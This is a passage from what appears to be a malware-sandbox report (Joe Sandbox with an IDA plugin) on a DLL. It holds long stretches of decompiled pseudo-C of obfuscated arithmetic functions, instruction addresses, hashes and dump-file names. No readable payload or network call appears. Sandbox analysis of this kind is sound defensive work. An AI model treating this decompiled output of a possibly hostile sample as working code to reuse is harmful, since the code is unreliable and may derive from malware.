									if(_t418 <=  *((intOrPtr*)(_t385 + 0x297c))) {
										_t353 = 0x177e;
										_t386 =  *(_t434 + 0x10);
										_t386[ *( *(_t434 + 0x10))] =  *(_t385 +  *_t353 * 4);
										 *(_t434 + 0x10) = _t386 - 4;
										 *0x177e =  *0x177e - 1;
										asm("cdq");
										_t358 =  *0x6d55d594; // 0x0
										 *0x6d55d5b8 =  *0x6d55d5b8 ^  *(_t434 + 0x1c) / ( *(_t424 +  *0x177e * 2) & 0x0000ffff) ^  *(_t424 + 0x2d6c) & 0x0000ffff;
										 *0x6d55d58a =  *(_t434 + 0x34);
										_t274 =  *0x6d55d578; // 0x0
										_t275 =  *0x6d55d5e0; // 0x0
										if(( *(_t424 + _t274 * 2) & 0x0000ffff) <  *((intOrPtr*)(_t358 + _t275 * 8)) || ( *( *0x177e +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff) >= _t418) {
											goto L24;
										}
									}
									break;
								}
								_t445 =  *0x6d55d5c0 - 0x861; // 0x0
								if(_t445 <= 0) {
									goto L20;
								}
								 *0x6d55d590 = ( *0x6d55d5d0 & 0x0000ffff ^ 0x00000df7) %  *0x6d55d590;
								 *(_t430 + _t336 * 8) = _t418 /  *(_t434 + 0x44) | _t418;
								 *0x6d55d5a4 =  *(_t425 * 0xc +  *(_t434 + 0x18)) /  *0x6d55d5a4;
								_t315 =  *0x6d55d5c8; // 0x0
								 *((intOrPtr*)(_t315 + _t336 * 4)) = _t418 + _t336;
							}
							goto L16;
							L24:
							 *(_t434 + 0x50) =  *(_t434 + 0x50) + 1;
							 *(1 + ( *(_t434 + 0x50) & 0x000000ff) * 0xc) = ( *( *(_t434 + 0x28) + ( *(_t434 + 0x50) & 0x000000ff) * 2) & 0x0000ffff) * _t418 /  *(1 + ( *(_t434 + 0x50) & 0x000000ff) * 0xc);
							( *(_t434 + 0x10))[ *( *(_t434 + 0x18))] = ( *(_t434 + 0x10))[ *( *(_t434 + 0x18))] * _t418;
							goto L17;
						}
						L18:
						_t347 =  *0x6d55d5c0 & 0x0000ffff;
						_t336 = _t336 + 1;
						 *(_t434 + 0x1c) =  *(_t434 + 0x1c) + 2;
					} while (_t336 <  *((intOrPtr*)(_t430 + _t347 * 4)));
					goto L19;
				} else {
					 *(_t434 + 0x1c) = _t335 - _t415;
					do {
						_push( *(_t434 + 0x14));
						 *( *0x6d55d5ac * 3 +  *((intOrPtr*)(_t434 + 0x48))) = 0x1e03 % ( *( *0x6d55d5ac * 3 +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff);
						_t372 =  *0x6d55d5d4; // 0x0
						asm("cdq");
						_t339 =  *0x6d55d58a; // 0x0
						 *(_t434 + 0x30) = (_t372 | 0x00000846) & 0x0000ffff;
						 *(_t434 + 0x34) = _t415 % _t372;
						asm("cdq");
						_t325 =  *0x6d55d580; // 0x0
						_t375 =  *0x6d55d57c; // 0x0
						_t433 =  *0x6d55d598; // 0x0
						 *0x6d55d580 = _t325 - 1;
						 *0x6d55d58a = _t339 - 1;
						asm("cdq");
						_push( *0x6d55d5a4);
						_t341 =  *(_t434 + 0x24);
						_t59 = _t433 + 0x1e5c; // 0x1e5c
						_push(_t375);
						_push(_t375 % _t433);
						_push(_t325);
						_push(_t415 % (_t339 & 0x000000ff));
						_t420 =  *((intOrPtr*)(_t434 + 0x2c));
						_push(_t341);
						_push( *((intOrPtr*)(_t434 + 0x48)));
						_push( *(_t434 + 0x50));
						_push(0x584);
						_push(_t420 -  *((intOrPtr*)(_t434 + 0x78)));
						_t332 = E6D505338();
						_t376 =  *0x6d55d598; // 0x0
						_t434 = _t434 + 0x30;
						_t415 = _t420 + 1;
						 *(_t434 + 0x14) = _t415;
						 *(_t434 + 0x1c) = _t341 - 1;
						 *((intOrPtr*)( *(_t434 + 0x10) + _t376 * 8)) = _t332;
						_t437 = _t415 -  *0x6d55d5b0; // 0x0
					} while (_t437 != 0);
					_t430 =  *(_t434 + 0x24);
					goto L4;
				}
			}
















































            0x6d519826
            0x6d51982f
            0x6d519830
            0x6d51983f
            0x6d519843
            0x6d51984f
            0x6d51985b
            0x6d519860
            0x6d519864
            0x6d519876
            0x6d519885
            0x6d519889
            0x6d519895
            0x6d519899
            0x6d5198a6
            0x6d5198a8
            0x6d5198b5
            0x6d5198b9
            0x6d5198be
            0x6d5198c3
            0x6d5198c7
            0x6d5198cb
            0x6d5198cf
            0x6d5198d5
            0x6d5199b1
            0x6d5199b1
            0x6d5199bc
            0x6d5199c3
            0x6d519bc0
            0x6d519bcd
            0x6d519bdf
            0x6d519bf1
            0x6d519bf7
            0x6d519bfd
            0x6d519c10
            0x6d519c10
            0x6d5199c9
            0x6d5199d0
            0x6d5199d4
            0x6d5199db
            0x6d5199e0
            0x6d5199e1
            0x6d5199ec
            0x6d5199f7
            0x6d5199fb
            0x6d519a04
            0x6d519a0c
            0x6d519a12
            0x6d519a1a
            0x6d519a24
            0x00000000
            0x00000000
            0x6d519a2d
            0x6d519a3c
            0x6d519a49
            0x6d519a51
            0x6d519a55
            0x6d519a58
            0x6d519a63
            0x6d519a6e
            0x6d519a72
            0x6d519a7d
            0x6d519a81
            0x6d519a8d
            0x6d519a99
            0x6d519a9f
            0x6d519aa9
            0x6d519aae
            0x6d519ab7
            0x6d519abf
            0x00000000
            0x00000000
            0x6d519adc
            0x6d519adc
            0x6d519af0
            0x6d519af6
            0x6d519afd
            0x6d519b03
            0x6d519c93
            0x6d519b21
            0x6d519b2b
            0x6d519c11
            0x6d519c15
            0x6d519c24
            0x6d519c2e
            0x6d519c38
            0x6d519c3d
            0x6d519c47
            0x6d519c53
            0x6d519c62
            0x6d519c65
            0x6d519c6a
            0x6d519c6f
            0x6d519c77
            0x6d519c7a
            0x6d519c7a
            0x6d519c2e
            0x6d519b8d
            0x6d519b8d
            0x6d519b91
            0x6d519b91
            0x6d519b97
            0x6d519b98
            0x6d519ba3
            0x6d519a5e
            0x6d519a6e
            0x6d519a72
            0x6d519a7d
            0x6d519a81
            0x6d519a8d
            0x6d519a99
            0x6d519a9f
            0x6d519aa9
            0x6d519aae
            0x6d519ab7
            0x6d519abf
            0x00000000
            0x00000000
            0x6d519abf
            0x00000000
            0x6d519ba3
            0x6d519b36
            0x6d519b3d
            0x00000000
            0x00000000
            0x6d519b5d
            0x6d519b6d
            0x6d519b80
            0x6d519b85
            0x6d519b8a
            0x6d519b8a
            0x00000000
            0x6d519c9b
            0x6d519cb7
            0x6d519cbb
            0x6d519cca
            0x00000000
            0x6d519cca
            0x6d519ba9
            0x6d519ba9
            0x6d519bb0
            0x6d519bb1
            0x6d519bb6
            0x00000000
            0x6d5198db
            0x6d5198df
            0x6d5198e3
            0x6d5198f5
            0x6d519901
            0x6d519904
            0x6d51990a
            0x6d51990d
            0x6d51991c
            0x6d519922
            0x6d519926
            0x6d51992c
            0x6d519933
            0x6d51993b
            0x6d519942
            0x6d51994b
            0x6d519951
            0x6d519954
            0x6d51995a
            0x6d51995e
            0x6d519964
            0x6d519965
            0x6d519966
            0x6d519967
            0x6d519968
            0x6d51996c
            0x6d51996d
            0x6d519971
            0x6d519975
            0x6d519981
            0x6d519982
            0x6d519987
            0x6d51998d
            0x6d519994
            0x6d519996
            0x6d51999a
            0x6d51999e
            0x6d5199a1
            0x6d5199a1
            0x6d5199ad
            0x00000000
            0x6d5199ad

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ea43cd46c43b10678b5990a64245ea443176515cc36b91ad4757b32ea0417f04
            • Instruction ID: d0765a43f9348067e43d3ed47c40dbc613b252c9fc6f3d41baa4c174753c1875
            • Opcode Fuzzy Hash: ea43cd46c43b10678b5990a64245ea443176515cc36b91ad4757b32ea0417f04
            • Instruction Fuzzy Hash: 29D167766082508FCB06CF1DC490A2ABBF1FBCA308F15486EF886C7661D774A855CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D516399 Relevance: .3, Instructions: 304COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 96%
            			E6D516399() {
				signed int _t249;
				intOrPtr _t253;
				signed int _t256;
				intOrPtr _t266;
				signed int _t274;
				signed int _t280;
				signed int _t289;
				signed int _t295;
				signed int _t299;
				signed int _t306;
				intOrPtr _t317;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int* _t346;
				signed int _t353;
				intOrPtr _t356;
				signed int _t358;
				signed int _t360;
				signed int _t371;
				signed int* _t374;
				signed int* _t379;
				intOrPtr _t385;
				signed int _t388;
				signed int _t401;
				intOrPtr _t418;
				intOrPtr _t430;
				signed int _t435;
				signed int _t436;
				signed int* _t441;
				void* _t444;
				intOrPtr* _t447;
				signed int* _t449;
				void* _t451;
				void* _t454;

				_t449 =  *(_t451 + 0x58);
				_t356 =  *((intOrPtr*)(_t451 + 0x5c));
				 *(_t451 + 0x2c) = _t449[0x1e17];
				_t435 =  *0x6d55d5b4 * 0x1281;
				 *0x6d55d59c =  *0x6d55d59c + 0xffff;
				_t249 =  *0x6d55d5ac; // 0x0
				_t441 =  *(_t356 + 0x3c40);
				 *(_t451 + 0x3c) = _t249;
				 *(_t451 + 0x40) = 0xc68 %  *0x6d55d5a4;
				 *(_t451 + 0x30) = _t441;
				_t401 =  *0x6d55d578; // 0x0
				 *(_t451 + 0x48) =  *( *_t449 +  *((intOrPtr*)(_t451 + 0x68))) & 0x15;
				_t253 =  *0x6d55d590; // 0x0
				 *((intOrPtr*)(_t451 + 0x44)) = _t253;
				 *((intOrPtr*)(_t451 + 0x38)) =  *((intOrPtr*)(_t356 + 0x328c)) +  *0x6d55d5a4;
				_t256 =  *0x6d55d5b0; // 0x0
				 *(_t451 + 0x64) = _t401;
				 *(_t451 + 0x28) = _t256;
				if(_t256 <=  *((intOrPtr*)( *(_t451 + 0x40) + 0x5098))) {
					 *(_t451 + 0x10) = _t435 << 4;
					 *(_t451 + 0x20) =  &(_t441[_t256]);
					 *((intOrPtr*)(_t451 + 0x34)) = (_t256 << 4) + _t356;
					 *(_t451 + 0x18) = 0x1b97 + _t435 * 4;
					 *(_t451 + 0x14) =  &(_t441[_t435 + 5]);
					 *((intOrPtr*)(_t451 + 0x4c)) = 0x1477 - _t441;
					do {
						_t274 =  *0x6d55d580; // 0x0
						 *( *(_t451 + 0x48) + _t274 * 4) = _t449[0xab9] /  *( *(_t451 + 0x48) + _t274 * 4);
						asm("cdq");
						_t280 =  *0x6d55d5d4; // 0x0
						_t371 =  *((intOrPtr*)(_t451 + 0x4c)) +  *(_t451 + 0x20);
						 *0x6d55d578 = ( *( *(_t451 + 0x28) +  *((intOrPtr*)(_t451 + 0x44))) & 0x000000ff) %  *(_t356 + 0x24dc);
						 *(_t451 + 0x24) = _t371;
						 *((intOrPtr*)(_t371 +  *(_t451 + 0x3c) - 0x1477)) = (_t280 ^ 0x00000d7f) + 0x1475;
						asm("cdq");
						_t374 =  *(_t451 + 0x64);
						 *(_t451 + 0x64) = _t374 - 4;
						 *( *((intOrPtr*)(_t451 + 0x38)) +  *_t374 * 4) = ( *(_t356 + 0x98 + (( *0x6d55d588 & 0x0000ffff) + ( *0x6d55d588 & 0x0000ffff)) * 8) |  *(_t356 +  *_t449 * 4)) % 0x6c5;
						_t289 =  *0x6d55d5ac; // 0x0
						_t441 =  *(_t451 + 0x30);
						_t449[_t289] = _t449[_t289] | 0x00001d94;
						 *0x6d55d5d4 =  *0x6d55d5d4 + 0x18fd;
						 *0x6d55d588 =  *0x6d55d588 & _t449[0x1e30] & 0x00001adb;
						 *((intOrPtr*)(_t356 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t356 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1477 + _t435 * 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x34))));
						_t454 =  *0x6d55d5c4 - 0x365; // 0x0
						if(_t454 < 0) {
							_t295 =  *0x6d55d584; // 0x0
							if(_t295 <  *((intOrPtr*)(_t449 +  *(_t451 + 0x10)))) {
								goto L4;
							} else {
								_t379 =  *(_t451 + 0x64);
								_t332 =  *_t379;
								if(_t441[_t332] > 0xfeb) {
									goto L5;
								} else {
									_t333 = _t332 - 1;
									 *(_t451 + 0x18) =  &(( *(_t451 + 0x18))[1]);
									 *_t379 = _t333;
									 *(_t451 + 0x14) =  &(( *(_t451 + 0x14))[1]);
									 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0x10;
									_t131 = _t333 + 0x4ae33; // 0x4ae32
									 *(_t131 << 4) =  *(_t131 << 4) *  *0x6d55d5dc;
									_t336 = _t435;
									asm("cdq");
									_t435 = _t435 + 1;
									 *0x6d55d58a = _t336 / ( *0x6d55d58a & 0x000000ff);
									 *_t441 =  *_t441 + 1;
									_t430 =  *((intOrPtr*)(_t451 + 0x68));
									 *((char*)(_t430 +  *( *(_t451 + 0x64)))) =  *((intOrPtr*)(0x1e37 +  *_t441 * 0xc));
									 *((intOrPtr*)((( *0x6d55d5c0 & 0x0000ffff) << 4) + 0x1b0f)) =  *((intOrPtr*)(_t356 + 0x62c)) + 0x174d;
									 *0x6d55d5c0 =  *0x6d55d5c0 + 1;
									 *((intOrPtr*)( *0x6d55d580 * 0xc +  *((intOrPtr*)(_t451 + 0x38)) + 0x1c)) = 0x18b5;
									 *( *(_t451 + 0x18)) = ( *(_t430 + 0x140e) & 0x000000ff ^ 0x000009cc) %  *( *(_t451 + 0x18));
								}
							}
						} else {
							_t346 =  *(_t451 + 0x64);
							 *_t346 =  *_t346 + 1;
							_t441 =  *(_t451 + 0x30);
							_t441[ *_t346] = 0x14a3 /  *( *(_t451 + 0x14)) - _t441[ *_t346];
							 *0x6d55d5e4 =  *(_t356 + 0x5ec4);
							 *0x6d55d5b0 =  *0x6d55d5b0 ^ 0x00001e76;
							 *0x6d55d59c =  *( *(_t451 + 0x24));
							_t353 =  *0x6d55d5ac; // 0x0
							 *0x6d55d5ac = _t353 + 0x12ee + _t435;
							L4:
							_t379 =  *(_t451 + 0x64);
							L5:
							_t418 =  *((intOrPtr*)(_t451 + 0x68));
							_t435 = _t435 - 1;
							 *(_t451 + 0x14) =  *(_t451 + 0x14) - 4;
							 *(_t451 + 0x18) =  *(_t451 + 0x18) - 4;
							 *(_t451 + 0x10) =  *(_t451 + 0x10) - 0x10;
							 *(_t451 + 0x24) =  *(_t435 + _t418) & 0x000000ff;
							 *(_t451 + 0x58) = _t435;
							_t449 =  *(_t451 + 0x60);
							if( *(_t451 + 0x24) ==  *( *(_t451 + 0x20))) {
								 *((intOrPtr*)(_t451 + 0x1c)) = _t356 +  *(_t451 + 0x24) * 4;
								 *((intOrPtr*)(_t451 + 0x50)) =  *(_t451 + 0x2c) - _t356;
								 *((intOrPtr*)(_t451 + 0x54)) = _t449 - _t356;
								while(1) {
									_t306 =  *0x6d55d580; // 0x0
									_t447 =  *((intOrPtr*)(_t451 + 0x1c));
									 *((intOrPtr*)(_t451 + 0x1c)) =  *((intOrPtr*)(_t451 + 0x1c)) + 4;
									 *0x6d55d5e4 =  *((intOrPtr*)( *(_t451 + 0x2c) + _t306 * 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x50)) + _t447)) -  *0x6d55d5e4 +  *_t447;
									 *((intOrPtr*)(0x1dff +  *_t379 * 4)) = 0x1184;
									 *0x6d55d584 =  *0x6d55d584 ^ (( *( *_t449 + _t418) & 0x000000ff) - 0x000004fe & 0x00000af0) -  *((intOrPtr*)(_t356 + 0x4060));
									_t317 =  *0x6d55d5bc; // 0x0
									 *(_t317 +  *_t449 * 4) = _t449[ *0x6d55d5c0 & 0x0000ffff] /  *(_t317 +  *_t449 * 4);
									 *(_t451 + 0x64) =  &(( *(_t451 + 0x64))[1]);
									asm("cdq");
									 *( *(_t451 + 0x3c) + ( *( *(_t451 + 0x64)) << 4)) = 0x4f1 %  *( *(_t451 + 0x3c) + ( *( *(_t451 + 0x64)) << 4));
									_t385 =  *0x6d55d5c8; // 0x0
									 *( *(_t451 + 0x10) + _t385) =  *( *(_t451 + 0x10) + _t385) & ( *( *((intOrPtr*)(_t451 + 0x68)) + 0x1483) & 0x000000ff &  *(_t451 + 0x28)) -  *((intOrPtr*)( *(_t451 + 0x2c) + 0x2084));
									_t388 =  *(_t451 + 0x24) + 1;
									 *(_t451 + 0x24) = _t388;
									 *0x6d55d5ac =  *( *((intOrPtr*)(_t451 + 0x54)) + _t447) * 0x160d % _t449[0xbd6] *  *0x6d55d5ac;
									if(_t388 !=  *( *(_t451 + 0x20))) {
										break;
									}
									_t379 =  *(_t451 + 0x64);
									_t418 =  *((intOrPtr*)(_t451 + 0x68));
								}
								_t435 =  *(_t451 + 0x58);
								_t441 =  *(_t451 + 0x30);
							}
						}
						_t299 =  *(_t451 + 0x28) + 1;
						 *((intOrPtr*)(_t451 + 0x34)) =  *((intOrPtr*)(_t451 + 0x34)) + 0x10;
						 *(_t451 + 0x20) =  &(( *(_t451 + 0x20))[1]);
						 *(_t451 + 0x28) = _t299;
					} while (_t299 <=  *((intOrPtr*)( *(_t451 + 0x40) + 0x5098)));
				}
				 *0x6d55d5e4 =  *0x6d55d5e4 & 0x00000892;
				_t436 = _t435 - 1;
				_t358 =  *0x6d55d598; // 0x0
				 *((_t358 << 4) + 0x1dff) = ( *(0x1473 + _t435 * 4) % _t436 + _t441[0x6d7]) *  *((_t358 << 4) + 0x1dff);
				_t360 =  *0x6d55d5d4; // 0x0
				 *0x6d55d598 =  *0x6d55d598 - 1;
				 *(0x4ae2b4 + _t360 * 4) = 0xf1b /  *(0x4ae2b4 + _t360 * 4);
				_t444 = 0xdc0 - _t449[_t436 - 1] - _t436 - 1;
				 *0x6d55d5c0 = (_t449[0x221] / 0x00000dc0 + 0x000009f5 |  *(_t356 + 0x6f50)) / ( *0x6d55d5c0 & 0x0000ffff);
				_t266 =  *0x6d55d5e0; // 0x0
				 *(_t266 +  *((intOrPtr*)(_t451 + 0x44))) =  *(_t266 +  *((intOrPtr*)(_t451 + 0x44))) & 0x000000f8;
				_t244 = _t444 + 0x1399; // 0x2159
				return _t244;
			}






































            0x6d51639e
            0x6d5163a4
            0x6d5163b0
            0x6d5163bf
            0x6d5163ce
            0x6d5163d5
            0x6d5163da
            0x6d5163e0
            0x6d5163e7
            0x6d5163f3
            0x6d5163fb
            0x6d516406
            0x6d51640a
            0x6d51640f
            0x6d51641f
            0x6d516423
            0x6d516428
            0x6d51642c
            0x6d516436
            0x6d516441
            0x6d51644d
            0x6d516451
            0x6d51645f
            0x6d516466
            0x6d516471
            0x6d516475
            0x6d516475
            0x6d51648f
            0x6d51649d
            0x6d5164a4
            0x6d5164b2
            0x6d5164bb
            0x6d5164c5
            0x6d5164c9
            0x6d5164eb
            0x6d5164ee
            0x6d5164f7
            0x6d516500
            0x6d516503
            0x6d51650c
            0x6d516510
            0x6d51651f
            0x6d51652c
            0x6d516543
            0x6d51654b
            0x6d516552
            0x6d516608
            0x6d516610
            0x00000000
            0x6d516612
            0x6d516612
            0x6d516616
            0x6d51661f
            0x00000000
            0x6d516621
            0x6d516621
            0x6d516622
            0x6d516627
            0x6d516629
            0x6d51662e
            0x6d516633
            0x6d516645
            0x6d516647
            0x6d516650
            0x6d516657
            0x6d516658
            0x6d51665d
            0x6d516664
            0x6d51666e
            0x6d516687
            0x6d516698
            0x6d51669f
            0x6d5166bb
            0x6d5166bb
            0x6d51661f
            0x6d516558
            0x6d516558
            0x6d516562
            0x6d51656d
            0x6d516574
            0x6d51657d
            0x6d516589
            0x6d516593
            0x6d516599
            0x6d5165a5
            0x6d5165aa
            0x6d5165aa
            0x6d5165ae
            0x6d5165ae
            0x6d5165b2
            0x6d5165b3
            0x6d5165b8
            0x6d5165bd
            0x6d5165c6
            0x6d5165d2
            0x6d5165d8
            0x6d5165dc
            0x6d5165e9
            0x6d5165f3
            0x6d5165fb
            0x6d5166ca
            0x6d5166ca
            0x6d5166da
            0x6d5166de
            0x6d5166f0
            0x6d5166fb
            0x6d51671f
            0x6d516728
            0x6d516741
            0x6d516747
            0x6d516758
            0x6d51675b
            0x6d516761
            0x6d51677e
            0x6d5167a3
            0x6d5167a4
            0x6d5167a8
            0x6d5167b0
            0x00000000
            0x00000000
            0x6d5166c2
            0x6d5166c6
            0x6d5166c6
            0x6d5167b6
            0x6d5167ba
            0x6d5167ba
            0x6d5165dc
            0x6d5167c6
            0x6d5167c7
            0x6d5167cc
            0x6d5167d1
            0x6d5167d5
            0x6d516475
            0x6d5167e1
            0x6d5167f4
            0x6d5167f7
            0x6d516817
            0x6d51681f
            0x6d516825
            0x6d516839
            0x6d516840
            0x6d516864
            0x6d51686a
            0x6d516870
            0x6d516874
            0x6d516880

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 263b757a136f23bc738ddcada74779d7fc088c9c2e2417afb1073087ab002416
            • Instruction ID: 6420dcac2c0070e736d6e456e38bfbd2f56387692535c95221582b19ce2f4c85
            • Opcode Fuzzy Hash: 263b757a136f23bc738ddcada74779d7fc088c9c2e2417afb1073087ab002416
            • Instruction Fuzzy Hash: 04E11576608341CFDB05CF19C480A6ABBF1FB8A308F15496EE88A8B761D774E945CF42
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D51755D Relevance: .3, Instructions: 287COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 94%
            			E6D51755D(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, signed short* _a32, intOrPtr _a40) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				signed short* _v16;
				signed int _v20;
				signed int _v24;
				signed char _v25;
				void* _t195;
				intOrPtr _t197;
				signed int _t199;
				signed int _t214;
				signed int _t218;
				intOrPtr _t226;
				signed int _t229;
				signed int _t230;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				intOrPtr _t242;
				signed int _t245;
				signed int _t246;
				signed char _t248;
				intOrPtr _t255;
				signed int _t256;
				intOrPtr _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t276;
				signed int _t286;
				signed char _t287;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				intOrPtr _t294;
				signed int _t298;
				intOrPtr _t302;
				signed int _t308;
				signed int _t312;
				signed int _t313;
				signed int _t318;
				signed int _t331;
				signed int _t332;
				signed short _t333;
				intOrPtr _t340;
				intOrPtr _t342;
				signed int _t343;
				signed short* _t362;
				signed short* _t363;
				signed short* _t364;
				intOrPtr _t366;
				signed int _t367;
				signed int _t369;
				intOrPtr _t370;
				signed int _t371;
				signed short _t372;
				signed short _t373;
				signed int _t374;
				signed int _t375;

				_t372 =  *0x6d55d5c0; // 0x0
				_t294 =  *0x6d55d570; // 0x0
				_t195 = 0x13;
				_v16 = _t195 -  *0x6d55d5e4;
				_t197 =  *0x6d55d5a4; // 0x0
				_v12 = _t197;
				 *0x6d55d5a4 = _t197 + 1;
				_t199 =  *0x6d55d58c; // 0x0
				_v24 = _t199;
				_t373 = _t372 + 0xffff;
				 *0x6d55d5c0 = _t373;
				_t287 =  *0x6d55d584; // 0x0
				_v25 = _t287;
				_v4 =  *(( *_a32 & 0x0000ffff) * 0xc + _t294) ^  *(_a16 + 0x47b4);
				_v8 =  *0x6d55d598 * 0xc;
				asm("cdq");
				_t331 =  *0x6d55d5b8; // 0x0
				_t362 = _a32;
				_v20 =  *(_a28 + 0x1528) /  *(_v8 + _t294) & 0x0000ffff;
				_t332 = _t331 + 1;
				 *0x6d55d5b8 = _t332;
				if((_t372 & 0x0000ffff) != _t331) {
					_t366 = _a8;
					__eflags =  *0x6d55d57c - ( *(_t366 + ( *_v16 & 0x0000ffff) * 2) & 0x0000ffff); // 0x0
					if(__eflags == 0) {
						L19:
						_t333 = _v20;
						 *(_a4 + (_t333 & 0x0000ffff) * 4) =  *(_a4 + (_t333 & 0x0000ffff) * 4) ^ 0xfffff5d6;
						_t214 =  *0x6d55d5b4; // 0x0
						_v20 = _t333 + 1;
						_t218 =  *0x6d55d5e0; // 0x0
						 *0x6d55d58a = _t214 % 0x18ac % 0x1249;
						_t340 =  *((intOrPtr*)(_a16 + _t218 * 4));
						__eflags = _t340 - 0x1c7;
						if(_t340 != 0x1c7) {
							goto L6;
						} else {
							_t374 = _v24;
							do {
								 *(_t374 + ( *0x6d55d59c & 0x0000ffff) * 8) =  *(_t374 + ( *0x6d55d59c & 0x0000ffff) * 8) ^  *(_t366 + 0x371e) & 0x0000ffff;
								_t312 =  *0x6d55d5d4; // 0x0
								_t258 =  *0x6d55d5a8; // 0x0
								_t313 = _t312 + 1;
								 *0x6d55d5d4 = _t313;
								 *((intOrPtr*)(_t258 + (_t313 + _t313) * 8)) = _t340;
								_t340 = _t340 + 1;
								__eflags = _t340 - 0x1c7;
							} while (_t340 == 0x1c7);
							goto L7;
						}
						goto L30;
					} else {
						_t370 = _v12;
						_t260 = ( *_t362 & 0x0000ffff) + ( *_t362 & 0x0000ffff);
						 *0x6d55d5c0 = _t373 + 1;
						__eflags =  *((intOrPtr*)(_t370 + _t260 * 8)) - (_t373 & 0x0000ffff);
						if( *((intOrPtr*)(_t370 + _t260 * 8)) < (_t373 & 0x0000ffff)) {
							_t366 = _a8;
							goto L19;
						} else {
							_t371 =  *0x6d55d580; // 0x0
							_t262 = _a40;
							__eflags =  *((intOrPtr*)(_t262 + 4 + _t371 * 4)) - 0x1c74;
							if( *((intOrPtr*)(_t262 + 4 + _t371 * 4)) < 0x1c74) {
								__eflags = _t332 - 0x187f;
								if(_t332 == 0x187f) {
									L15:
									__eflags = _t332 - 0x1379;
									if(_t332 != 0x1379) {
										goto L17;
									} else {
										goto L16;
									}
								} else {
									__eflags =  *0x6d55d5a4 - ( *(_a8 + ( *_t362 & 0x0000ffff) * 2) & 0x0000ffff); // 0x0
									if(__eflags != 0) {
										L16:
										__eflags =  *0x6d55d5d8 - 0x18c9;
										if( *0x6d55d5d8 == 0x18c9) {
											goto L6;
										} else {
											L17:
											_t318 =  *0x6d55d5d4; // 0x0
											 *0x6d55d58c = _v24 |  *(_v4 + 0x3454) | _a24;
											 *((intOrPtr*)(_v8 + _a28)) =  *((intOrPtr*)(_v8 + _a28)) + _t371 % ( *(_t362 + _t318 * 4) & 0x0000ffff);
											_t239 =  *(( *_t362 & 0x0000ffff) * 3 + _a20) & 0x000000ff;
										}
									} else {
										goto L15;
									}
								}
							} else {
								 *(_v12 + ( *_t362 & 0x0000ffff) * 8) = 0x84 %  *(_v12 + ( *_t362 & 0x0000ffff) * 8);
								_t276 = 0x3c;
								 *0x6d55d5b0 = _t276 % (_v20 & 0x0000ffff);
								 *0xcaa =  *0xcaa - 1;
								asm("cdq");
								_t62 =  *(_a28 + 0x744) %  *0x6d55d5a0;
								__eflags = _t62;
								 *((short*)(_a8 +  *0xcaa * 8)) = _t62;
								L6:
								_t374 = _v24;
								L7:
								_t298 = _a24;
								goto L8;
							}
						}
					}
				} else {
					 *0x6d55d588 = 0x16b8;
					_t374 = _v24;
					 *((intOrPtr*)(_a16 + (_t373 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_a16 + (_t373 & 0x0000ffff) * 4)) + 0x1ee8;
					_t298 = _a24;
					_t286 =  *0x6d55d598; // 0x0
					_t287 = 0x0000006a -  *((intOrPtr*)(_a20 + 8)) ^  *0x6d55d574;
					_v25 = 0x6a;
					 *(_t374 + _t286 * 8) =  *(_t374 + _t286 * 8) ^ _t298;
					L8:
					 *_t362 =  *_t362 + 1;
					_t342 =  *((intOrPtr*)(_v4 + 0x1c + ( *_t362 & 0x0000ffff) * 8));
					if(_t342 >= _t298) {
						_t375 = _a24;
						_t369 = _a12 ^ 0x000007db;
						_t364 = _v16;
						do {
							_t255 =  *0x6d55d570; // 0x0
							 *(_t255 + ( *_t364 & 0x0000ffff) * 4) = _t369;
							_t256 = _t287 & 0x000000ff;
							_t287 = _t287 - 1;
							_t342 = _t342 + 1;
							 *0x6d55d5e4 = _t256;
						} while (_t342 >= _t375);
